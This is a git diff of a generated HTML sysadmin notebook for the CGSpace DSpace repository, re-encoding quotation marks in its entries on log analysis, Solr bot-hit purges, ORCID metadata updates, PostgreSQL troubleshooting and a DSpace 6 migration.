# grep 91.241.19.70 /var/log/nginx/access.log.1 | grep -c &#39;10568/35187&#39;
8900
</code></pre><ul>
<li>I thought the host might have been Yandex misbehaving, but its user agent is:</li>
@ -343,20 +343,20 @@ Total number of bot hits purged: 8909
</code></pre><ul>
<li>While investigating that I noticed ORCID identifiers missing from a few authors names, so I added them with my <code>add-orcid-identifiers.py</code> script:</li>
</ul>
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2020-04-20-add-orcids.csv -db dspace -u dspace -p 'fuuu' -d
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2020-04-20-add-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39; -d
</code></pre><ul>
<li>The contents of <code>2020-04-20-add-orcids.csv</code> was:</li>
</ul>
<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
&quot;Schut, Marc&quot;,&quot;Marc Schut: 0000-0002-3361-4581&quot;
&quot;Schut, M.&quot;,&quot;Marc Schut: 0000-0002-3361-4581&quot;
&quot;Kamau, G.&quot;,&quot;Geoffrey Kamau: 0000-0002-6995-4801&quot;
&quot;Kamau, G&quot;,&quot;Geoffrey Kamau: 0000-0002-6995-4801&quot;
&quot;Triomphe, Bernard&quot;,&quot;Bernard Triomphe: 0000-0001-6657-3002&quot;
&quot;Waters-Bayer, Ann&quot;,&quot;Ann Waters-Bayer: 0000-0003-1887-7903&quot;
&quot;Klerkx, Laurens&quot;,&quot;Laurens Klerkx: 0000-0002-1664-886X&quot;
&#34;Schut, Marc&#34;,&#34;Marc Schut: 0000-0002-3361-4581&#34;
&#34;Schut, M.&#34;,&#34;Marc Schut: 0000-0002-3361-4581&#34;
&#34;Kamau, G.&#34;,&#34;Geoffrey Kamau: 0000-0002-6995-4801&#34;
&#34;Kamau, G&#34;,&#34;Geoffrey Kamau: 0000-0002-6995-4801&#34;
&#34;Triomphe, Bernard&#34;,&#34;Bernard Triomphe: 0000-0001-6657-3002&#34;
&#34;Waters-Bayer, Ann&#34;,&#34;Ann Waters-Bayer: 0000-0003-1887-7903&#34;
&#34;Klerkx, Laurens&#34;,&#34;Laurens Klerkx: 0000-0002-1664-886X&#34;
</code></pre><ul>
<li>I confirmed some of the authors' names from the report itself, then by looking at their profiles on ORCID.org</li>
<li>I confirmed some of the authors&rsquo; names from the report itself, then by looking at their profiles on ORCID.org</li>
<li>Add new ILRI subject &ldquo;COVID19&rdquo; to the <code>5_x-prod</code> branch</li>
<li>Add new CCAFS Phase II project tags to the <code>5_x-prod</code> branch</li>
<li>I will deploy these to CGSpace in the next few days</li>
@ -387,17 +387,17 @@ Total number of bot hits purged: 8909
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ time chrt -i 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
</code></pre><ul>
<li>I ran the <code>dspace cleanup -v</code> process on CGSpace and got an error:</li>
</ul>
<pre tabindex="0"><code>Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(184980) is still referenced from table &quot;bundle&quot;.
<pre tabindex="0"><code>Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(184980) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution is, as always:</li>
</ul>
<pre tabindex="0"><code>$ psql -d dspace -U dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (183996);'
<pre tabindex="0"><code>$ psql -d dspace -U dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (183996);&#39;
UPDATE 1
</code></pre><ul>
<li>I spent some time working on the XMLUI themes in DSpace 6
@ -413,7 +413,7 @@ UPDATE 1
</li>
</ul>
<pre tabindex="0"><code>.breadcrumb &gt; li + li:before {
content: &quot;/\00a0&quot;;
content: &#34;/\00a0&#34;;
}
</code></pre><h2 id="2020-04-27">2020-04-27</h2>
<ul>
@ -421,9 +421,9 @@ UPDATE 1
<li>My changes to DSpace XMLUI Mirage 2 build process mean that we don&rsquo;t need Ruby gems at all anymore! We can completely build without them!</li>
<li>Trying to test the <code>com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI</code> script but there is an error:</li>
</ul>
<pre tabindex="0"><code>Exception: org.apache.solr.search.SyntaxError: Cannot parse 'cua_version:${cua.version.number}': Encountered &quot; &quot;}&quot; &quot;} &quot;&quot; at line 1, column 32.
<pre tabindex="0"><code>Exception: org.apache.solr.search.SyntaxError: Cannot parse &#39;cua_version:${cua.version.number}&#39;: Encountered &#34; &#34;}&#34; &#34;} &#34;&#34; at line 1, column 32.
Was expecting one of:
&quot;TO&quot; ...
&#34;TO&#34; ...
&lt;RANGE_QUOTED&gt; ...
&lt;RANGE_GOOP&gt; ...
</code></pre><ul>
@ -473,7 +473,7 @@ atmire-cua.version.number=${cua.version.number}
</ul>
</li>
</ul>
<pre tabindex="0"><code>Record uid: ee085cc0-0110-42c5-80b9-0fad4015ed9f couldn't be processed
<pre tabindex="0"><code>Record uid: ee085cc0-0110-42c5-80b9-0fad4015ed9f couldn&#39;t be processed
com.atmire.statistics.util.update.atomic.ProcessingException: something went wrong while processing record uid: ee085cc0-0110-42c5-80b9-0fad4015ed9f, an error occured in the com.atmire.statistics.util.update.atomic.processor.ContainerOwnerDBProcessor
at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.applyProcessors(AtomicStatisticsUpdater.java:304)
at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.processRecords(AtomicStatisticsUpdater.java:176)
@ -508,7 +508,7 @@ Caused by: java.lang.NullPointerException
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ grep ERROR dspace.log.2020-04-29 | cut -f 3- -d' ' | sort | uniq -c | sort -n
<pre tabindex="0"><code>$ grep ERROR dspace.log.2020-04-29 | cut -f 3- -d&#39; &#39; | sort | uniq -c | sort -n
1 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL findByUnique Error -
1 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL find Error -
1 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL query singleTable Error -
@ -524,25 +524,25 @@ Caused by: java.lang.NullPointerException
<ul>
<li>Database connections do seem high:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
5 dspaceApi
6 dspaceCli
88 dspaceWeb
</code></pre><ul>
<li>Most of those are idle in transaction:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'select * from pg_stat_activity' | grep 'dspaceWeb' | grep -c &quot;idle in transaction&quot;
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep &#39;dspaceWeb&#39; | grep -c &#34;idle in transaction&#34;
67
</code></pre><ul>
<li>I don&rsquo;t see anything in the PostgreSQL or Tomcat logs suggesting anything is wrong&hellip; I think the solution to clear these idle connections is probably to just restart Tomcat</li>
<li>I looked at the Solr stats for this month and see lots of suspicious IPs:</li>
</ul>
<pre tabindex="0"><code>$ curl -s 'http://localhost:8081/solr/statistics/select?q=*:*&amp;fq=dateYearMonth:2020-04&amp;rows=0&amp;wt=json&amp;indent=true&amp;facet=true&amp;facet.field=ip
<pre tabindex="0"><code>$ curl -s &#39;http://localhost:8081/solr/statistics/select?q=*:*&amp;fq=dateYearMonth:2020-04&amp;rows=0&amp;wt=json&amp;indent=true&amp;facet=true&amp;facet.field=ip
&quot;88.99.115.53&quot;,23621, # Hetzner, using XMLUI and REST API with no user agent
&quot;104.154.216.0&quot;,11865,# Google cloud, scraping XMLUI with no user agent
&quot;104.198.96.245&quot;,4925,# Google cloud, using REST API with no user agent
&quot;52.34.238.26&quot;,2907, # EcoSearch on XMLUI, user agent: EcoSearch (+https://search.ecointernet.org/)
&#34;88.99.115.53&#34;,23621, # Hetzner, using XMLUI and REST API with no user agent
&#34;104.154.216.0&#34;,11865,# Google cloud, scraping XMLUI with no user agent
&#34;104.198.96.245&#34;,4925,# Google cloud, using REST API with no user agent
&#34;52.34.238.26&#34;,2907, # EcoSearch on XMLUI, user agent: EcoSearch (+https://search.ecointernet.org/)
</code></pre><ul>
<li>And a bunch more&hellip; ugh&hellip;
<ul>
@ -561,10 +561,10 @@ $ ./check-spider-ip-hits.sh -f /tmp/ips -s statistics -p
<li>Then I added a few of them to the bot mapping in the nginx config because it appears they are regular harvesters since 2018</li>
<li>Looking through the Solr stats faceted by the <code>userAgent</code> field I see some interesting ones:</li>
</ul>
<pre tabindex="0"><code>$ curl 'http://localhost:8081/solr/statistics/select?q=*%3A*&amp;rows=0&amp;wt=json&amp;indent=true&amp;facet=true&amp;facet.field=userAgent'
<pre tabindex="0"><code>$ curl &#39;http://localhost:8081/solr/statistics/select?q=*%3A*&amp;rows=0&amp;wt=json&amp;indent=true&amp;facet=true&amp;facet.field=userAgent&#39;
...
&quot;Delphi 2009&quot;,50725,
&quot;OgScrper/1.0.0&quot;,12421,
&#34;Delphi 2009&#34;,50725,
&#34;OgScrper/1.0.0&#34;,12421,
</code></pre><ul>
<li>Delphi is only used by IP addresses in Greece, so that&rsquo;s obviously the GARDIAN people harvesting us&hellip;</li>
<li>I have no idea what OgScrper is, but it&rsquo;s not a user!</li>
@ -586,11 +586,11 @@ $ ./check-spider-hits.sh -f /tmp/agents -s statistics -p
<li>That&rsquo;s about 300,000 hits purged&hellip;</li>
<li>Then remove the ones with spaces manually, checking the query syntax first, then deleting in yearly cores and the statistics core:</li>
</ul>
<pre tabindex="0"><code>$ curl -s &quot;http://localhost:8081/solr/statistics/select&quot; -d &quot;q=userAgent:/Delphi 2009/&amp;rows=0&quot;
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics/select&#34; -d &#34;q=userAgent:/Delphi 2009/&amp;rows=0&#34;
...
&lt;lst name=&quot;responseHeader&quot;&gt;&lt;int name=&quot;status&quot;&gt;0&lt;/int&gt;&lt;int name=&quot;QTime&quot;&gt;52&lt;/int&gt;&lt;lst name=&quot;params&quot;&gt;&lt;str name=&quot;q&quot;&gt;userAgent:/Delphi 2009/&lt;/str&gt;&lt;str name=&quot;rows&quot;&gt;0&lt;/str&gt;&lt;/lst&gt;&lt;/lst&gt;&lt;result name=&quot;response&quot; numFound=&quot;38760&quot; start=&quot;0&quot;&gt;&lt;/result&gt;
$ for year in {2010..2019}; do curl -s &quot;http://localhost:8081/solr/statistics-$year/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary '&lt;delete&gt;&lt;query&gt;userAgent:&quot;Delphi 2009&quot;&lt;/query&gt;&lt;/delete&gt;'; done
$ curl -s &quot;http://localhost:8081/solr/statistics/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary '&lt;delete&gt;&lt;query&gt;userAgent:&quot;Delphi 2009&quot;&lt;/query&gt;&lt;/delete&gt;'
&lt;lst name=&#34;responseHeader&#34;&gt;&lt;int name=&#34;status&#34;&gt;0&lt;/int&gt;&lt;int name=&#34;QTime&#34;&gt;52&lt;/int&gt;&lt;lst name=&#34;params&#34;&gt;&lt;str name=&#34;q&#34;&gt;userAgent:/Delphi 2009/&lt;/str&gt;&lt;str name=&#34;rows&#34;&gt;0&lt;/str&gt;&lt;/lst&gt;&lt;/lst&gt;&lt;result name=&#34;response&#34; numFound=&#34;38760&#34; start=&#34;0&#34;&gt;&lt;/result&gt;
$ for year in {2010..2019}; do curl -s &#34;http://localhost:8081/solr/statistics-$year/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;userAgent:&#34;Delphi 2009&#34;&lt;/query&gt;&lt;/delete&gt;&#39;; done
$ curl -s &#34;http://localhost:8081/solr/statistics/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;userAgent:&#34;Delphi 2009&#34;&lt;/query&gt;&lt;/delete&gt;&#39;
</code></pre><ul>
<li>Quoting them works for now until I can look into it and handle it properly in the script</li>
<li>This was about 400,000 hits in total purged from the Solr statistics</li>
@ -607,7 +607,7 @@ $ curl -s &quot;http://localhost:8081/solr/statistics/update?softCommit=true&quo
</li>
</ul>
<pre tabindex="0"><code># mv /etc/letsencrypt /etc/letsencrypt.bak
# /opt/certbot-auto certonly --standalone --email fu@m.com -d dspacetest.cgiar.org --standalone --pre-hook &quot;/bin/systemctl stop nginx&quot; --post-hook &quot;/bin/systemctl start nginx&quot;
# /opt/certbot-auto certonly --standalone --email fu@m.com -d dspacetest.cgiar.org --standalone --pre-hook &#34;/bin/systemctl stop nginx&#34; --post-hook &#34;/bin/systemctl start nginx&#34;
# /opt/certbot-auto revoke --cert-path /etc/letsencrypt.bak/live/dspacetest.cgiar.org/cert.pem
# rm -rf /etc/letsencrypt.bak
</code></pre><ul>
@ -618,11 +618,11 @@ $ curl -s &quot;http://localhost:8081/solr/statistics/update?softCommit=true&quo
<ul>
<li>But I don&rsquo;t see a lot of connections in PostgreSQL itself:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
5 dspaceApi
6 dspaceCli
14 dspaceWeb
$ psql -c 'select * from pg_stat_activity' | wc -l
$ psql -c &#39;select * from pg_stat_activity&#39; | wc -l
30
</code></pre><ul>
<li>Tezira said she cleared her browser cache and then was able to submit again

View File

@ -34,7 +34,7 @@ I see that CGSpace (linode18) is still using PostgreSQL JDBC driver version 42.2
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -166,7 +166,7 @@ I see that CGSpace (linode18) is still using PostgreSQL JDBC driver version 42.2
</ul>
</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;07/May/2020:(01|03|04)&quot; | goaccess --log-format=COMBINED -
<pre tabindex="0"><code># cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;07/May/2020:(01|03|04)&#34; | goaccess --log-format=COMBINED -
</code></pre><ul>
<li>The two main IPs making requests around then are 188.134.31.88 and 212.34.8.188
<ul>
@ -211,9 +211,9 @@ Total number of bot hits purged: 192332
</ul>
<pre tabindex="0"><code>$ cat 2020-05-11-add-orcids.csv
dc.contributor.author,cg.creator.id
&quot;Lutakome, P.&quot;,&quot;Pius Lutakome: 0000-0002-0804-2649&quot;
&quot;Lutakome, Pius&quot;,&quot;Pius Lutakome: 0000-0002-0804-2649&quot;
$ ./add-orcid-identifiers-csv.py -i 2020-05-11-add-orcids.csv -db dspace -u dspace -p 'fuuu' -d
&#34;Lutakome, P.&#34;,&#34;Pius Lutakome: 0000-0002-0804-2649&#34;
&#34;Lutakome, Pius&#34;,&#34;Pius Lutakome: 0000-0002-0804-2649&#34;
$ ./add-orcid-identifiers-csv.py -i 2020-05-11-add-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39; -d
</code></pre><ul>
<li>Run system updates on CGSpace (linode18) and reboot it
<ul>
@ -265,8 +265,8 @@ $ ./add-orcid-identifiers-csv.py -i 2020-05-11-add-orcids.csv -db dspace -u dspa
</ul>
<pre tabindex="0"><code>$ cat 2020-05-19-add-orcids.csv
dc.contributor.author,cg.creator.id
&quot;Bahta, Sirak T.&quot;,&quot;Sirak Bahta: 0000-0002-5728-2489&quot;
$ ./add-orcid-identifiers-csv.py -i 2020-05-19-add-orcids.csv -db dspace -u dspace -p 'fuuu' -d
&#34;Bahta, Sirak T.&#34;,&#34;Sirak Bahta: 0000-0002-5728-2489&#34;
$ ./add-orcid-identifiers-csv.py -i 2020-05-19-add-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39; -d
</code></pre><ul>
<li>An IITA user is having issues submitting to CGSpace and I see there are a rising number of PostgreSQL connections waiting in transaction and in lock:</li>
</ul>
@ -300,9 +300,9 @@ $ ./add-orcid-identifiers-csv.py -i 2020-05-19-add-orcids.csv -db dspace -u dspa
</ul>
<pre tabindex="0"><code>$ cat 2020-05-25-add-orcids.csv
dc.contributor.author,cg.creator.id
&quot;Díaz, Manuel F.&quot;,&quot;Manuel Francisco Diaz Baca: 0000-0001-8996-5092&quot;
&quot;Díaz, Manuel Francisco&quot;,&quot;Manuel Francisco Diaz Baca: 0000-0001-8996-5092&quot;
$ ./add-orcid-identifiers-csv.py -i 2020-05-25-add-orcids.csv -db dspace -u dspace -p 'fuuu' -d
&#34;Díaz, Manuel F.&#34;,&#34;Manuel Francisco Diaz Baca: 0000-0001-8996-5092&#34;
&#34;Díaz, Manuel Francisco&#34;,&#34;Manuel Francisco Diaz Baca: 0000-0001-8996-5092&#34;
$ ./add-orcid-identifiers-csv.py -i 2020-05-25-add-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39; -d
</code></pre><ul>
<li>Last week Maria asked again about searching for items by accession or issue date
<ul>
@ -327,7 +327,7 @@ $ ./add-orcid-identifiers-csv.py -i 2020-05-25-add-orcids.csv -db dspace -u dspa
</ul>
</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/*.log.1 | grep -E &quot;29/May/2020:(02|03|04|05)&quot; | goaccess --log-format=COMBINED -
<pre tabindex="0"><code># cat /var/log/nginx/*.log.1 | grep -E &#34;29/May/2020:(02|03|04|05)&#34; | goaccess --log-format=COMBINED -
</code></pre><ul>
<li>The top is 172.104.229.92, which is the AReS harvester (still not using a user agent, but it&rsquo;s tagged as a bot in the nginx mapping)</li>
<li>Second is 188.134.31.88, which is a Russian host that we also saw in the last few weeks, using a browser user agent and hitting the XMLUI (but it is tagged as a bot in nginx as well)</li>
@ -361,13 +361,13 @@ $ ./add-orcid-identifiers-csv.py -i 2020-05-25-add-orcids.csv -db dspace -u dspa
<pre tabindex="0"><code>$ sudo su - postgres
$ dropdb dspacetest
$ createdb -O dspacetest --encoding=UNICODE dspacetest
$ psql dspacetest -c 'alter user dspacetest superuser;'
$ psql dspacetest -c &#39;alter user dspacetest superuser;&#39;
$ pg_restore -d dspacetest -O --role=dspacetest /tmp/cgspace_2020-05-31.backup
$ psql dspacetest -c 'alter user dspacetest nosuperuser;'
$ psql dspacetest -c &#39;alter user dspacetest nosuperuser;&#39;
# run DSpace 5 version of update-sequences.sql!!!
$ psql -f /home/dspace/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
$ psql dspacetest -c &quot;DELETE FROM schema_version WHERE version IN ('5.8.2015.12.03.3');&quot;
$ psql dspacetest -c 'CREATE EXTENSION pgcrypto;'
$ psql dspacetest -c &#34;DELETE FROM schema_version WHERE version IN (&#39;5.8.2015.12.03.3&#39;);&#34;
$ psql dspacetest -c &#39;CREATE EXTENSION pgcrypto;&#39;
$ exit
</code></pre><ul>
<li>Now switch to the DSpace 6.x branch and start a build:</li>
@ -391,7 +391,7 @@ $ ant update
<li>I had a mistake in my Solr internal URL parameter so DSpace couldn&rsquo;t find it, but once I fixed that DSpace starts up OK!</li>
<li>Once the initial Discovery reindexing was completed (after three hours or so!) I started the Solr statistics UUID migration:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Xmx1024m -Dfile.encoding=UTF-8&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;
$ dspace solr-upgrade-statistics-6x -i statistics -n 250000
$ dspace solr-upgrade-statistics-6x -i statistics -n 1000000
$ dspace solr-upgrade-statistics-6x -i statistics -n 1000000
@ -400,8 +400,8 @@ $ dspace solr-upgrade-statistics-6x -i statistics -n 1000000
<li>It&rsquo;s taking about 35 minutes for 1,000,000 records&hellip;</li>
<li>Some issues towards the end of this core:</li>
</ul>
<pre tabindex="0"><code>Exception: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
<pre tabindex="0"><code>Exception: Error while creating field &#39;p_group_id{type=uuid,properties=indexed,stored,multiValued}&#39; from value &#39;10&#39;
org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field &#39;p_group_id{type=uuid,properties=indexed,stored,multiValued}&#39; from value &#39;10&#39;
at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
@ -425,17 +425,17 @@ org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error whil
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ ./run.sh -s http://localhost:8081/solr/statistics -a export -o statistics-unmigrated.json -k uid -f '(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)'
$ curl -s &quot;http://localhost:8081/solr/statistics/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary &quot;&lt;delete&gt;&lt;query&gt;(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)&lt;/query&gt;&lt;/delete&gt;&quot;
<pre tabindex="0"><code>$ ./run.sh -s http://localhost:8081/solr/statistics -a export -o statistics-unmigrated.json -k uid -f &#39;(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)&#39;
$ curl -s &#34;http://localhost:8081/solr/statistics/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#34;&lt;delete&gt;&lt;query&gt;(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)&lt;/query&gt;&lt;/delete&gt;&#34;
</code></pre><ul>
<li>Now the UUID conversion script says there is nothing left to convert, so I can try to run the Atmire CUA conversion utility:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Xmx1024m -Dfile.encoding=UTF-8&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;
$ dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 1
</code></pre><ul>
<li>The processing is very slow and there are lots of errors like this:</li>
</ul>
<pre tabindex="0"><code>Record uid: 7b5b3900-28e8-417f-9c1c-e7d88a753221 couldn't be processed
<pre tabindex="0"><code>Record uid: 7b5b3900-28e8-417f-9c1c-e7d88a753221 couldn&#39;t be processed
com.atmire.statistics.util.update.atomic.ProcessingException: something went wrong while processing record uid: 7b5b3900-28e8-417f-9c1c-e7d88a753221, an error occured in the com.atmire.statistics.util.update.atomic.processor.ContainerOwnerDBProcessor
at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.applyProcessors(AtomicStatisticsUpdater.java:304)
at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.processRecords(AtomicStatisticsUpdater.java:176)

View File

@ -36,7 +36,7 @@ I sent Atmire the dspace.log from today and told them to log into the server to
In other news, I checked the statistics API on DSpace 6 and it&rsquo;s working
I tried to build the OAI registry on the freshly migrated DSpace 6 on DSpace Test and I get an error:
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -161,8 +161,8 @@ java.lang.NullPointerException
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ curl http://localhost:8080/solr/oai/update -H &quot;Content-type: text/xml&quot; --data-binary '&lt;delete&gt;&lt;query&gt;*:*&lt;/query&gt;&lt;/delete&gt;'
$ curl http://localhost:8080/solr/oai/update -H &quot;Content-type: text/xml&quot; --data-binary '&lt;commit /&gt;'
<pre tabindex="0"><code>$ curl http://localhost:8080/solr/oai/update -H &#34;Content-type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;*:*&lt;/query&gt;&lt;/delete&gt;&#39;
$ curl http://localhost:8080/solr/oai/update -H &#34;Content-type: text/xml&#34; --data-binary &#39;&lt;commit /&gt;&#39;
$ ~/dspace63/bin/dspace oai import
OAI 2.0 manager action started
...
@ -279,7 +279,7 @@ sys 3m13.929s
<li>In theory we can have different languages for metadata fields but in practice we don&rsquo;t do that, so we might as well normalize everything to &ldquo;en_US&rdquo; (and perhaps I should make a curation task to do this)</li>
<li>For now I will do it manually on CGSpace and DSpace Test:</li>
</ul>
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2;
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE resource_type_id=2;
UPDATE 2414738
</code></pre><ul>
<li>Note: DSpace Test doesn&rsquo;t have the <code>resource_type_id</code> column because it&rsquo;s running DSpace 6 and <a href="https://wiki.lyrasis.org/display/DSPACE/DSpace+Service+based+api">the schema changed to use an object model there</a>
@ -288,7 +288,7 @@ UPDATE 2414738
</ul>
</li>
</ul>
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item);
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE dspace_object_id IN (SELECT uuid FROM item);
</code></pre><ul>
<li>Peter asked if it was possible to find all ILRI items that have &ldquo;zoonoses&rdquo; or &ldquo;zoonotic&rdquo; in their titles and check if they have the ILRI subject &ldquo;ZOONOTIC DISEASES&rdquo; (and add it if not)
<ul>
@ -320,7 +320,7 @@ UPDATE 2414738
</li>
</ul>
<pre tabindex="0"><code>$ dspace metadata-export -i 10568/1 -f /tmp/2020-06-08-ILRI.csv
$ csvcut -c 'id,cg.subject.ilri[en_US],dc.title[en_US]' ~/Downloads/2020-06-08-ILRI.csv &gt; /tmp/ilri.csv
$ csvcut -c &#39;id,cg.subject.ilri[en_US],dc.title[en_US]&#39; ~/Downloads/2020-06-08-ILRI.csv &gt; /tmp/ilri.csv
</code></pre><ul>
<li>Moayad asked why he&rsquo;s getting HTTP 500 errors on CGSpace
<ul>
@ -329,7 +329,7 @@ $ csvcut -c 'id,cg.subject.ilri[en_US],dc.title[en_US]' ~/Downloads/2020-06-08-I
</ul>
</li>
</ul>
<pre tabindex="0"><code># journalctl --since=today -u tomcat7 | grep -c 'Internal Server Error'
<pre tabindex="0"><code># journalctl --since=today -u tomcat7 | grep -c &#39;Internal Server Error&#39;
482
</code></pre><ul>
<li>They are all related to the REST API, like:</li>
@ -366,12 +366,12 @@ Jun 06 08:19:54 linode18 tomcat7[6286]: at java.lang.reflect.Method.invo
</code></pre><ul>
<li>Looking back, I see ~800 of these errors since I changed the database configuration last week:</li>
</ul>
<pre tabindex="0"><code># journalctl --since=2020-06-04 --until=today -u tomcat7 | grep -c 'javax.ws.rs.WebApplicationException'
<pre tabindex="0"><code># journalctl --since=2020-06-04 --until=today -u tomcat7 | grep -c &#39;javax.ws.rs.WebApplicationException&#39;
795
</code></pre><ul>
<li>And only ~280 in the entire month before that&hellip;</li>
</ul>
<pre tabindex="0"><code># journalctl --since=2020-05-01 --until=2020-06-04 -u tomcat7 | grep -c 'javax.ws.rs.WebApplicationException'
<pre tabindex="0"><code># journalctl --since=2020-05-01 --until=2020-06-04 -u tomcat7 | grep -c &#39;javax.ws.rs.WebApplicationException&#39;
286
</code></pre><ul>
<li>So it seems to be related to the database, perhaps that there are less connections in the pool?
@ -394,7 +394,7 @@ Jun 06 08:19:54 linode18 tomcat7[6286]: at java.lang.reflect.Method.invo
</code></pre><ul>
<li>Looking at the nginx access logs I see that, other than something that seems like Google Feedburner, all hosts using this user agent are all in Sweden!</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.*.gz | grep 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36' | grep -v '/feed' | awk '{print $1}' | sort | uniq -c | sort -n
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.*.gz | grep &#39;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36&#39; | grep -v &#39;/feed&#39; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n
1624 192.36.136.246
1627 192.36.241.95
1629 192.165.45.204
@ -480,7 +480,7 @@ Total number of bot hits purged: 29025
</ul>
</li>
</ul>
<pre tabindex="0"><code>172.104.229.92 - - [13/Jun/2020:02:00:00 +0200] &quot;GET /rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=50&amp;offset=0 HTTP/1.1&quot; 403 260 &quot;-&quot; &quot;-&quot;
<pre tabindex="0"><code>172.104.229.92 - - [13/Jun/2020:02:00:00 +0200] &#34;GET /rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=50&amp;offset=0 HTTP/1.1&#34; 403 260 &#34;-&#34; &#34;-&#34;
</code></pre><ul>
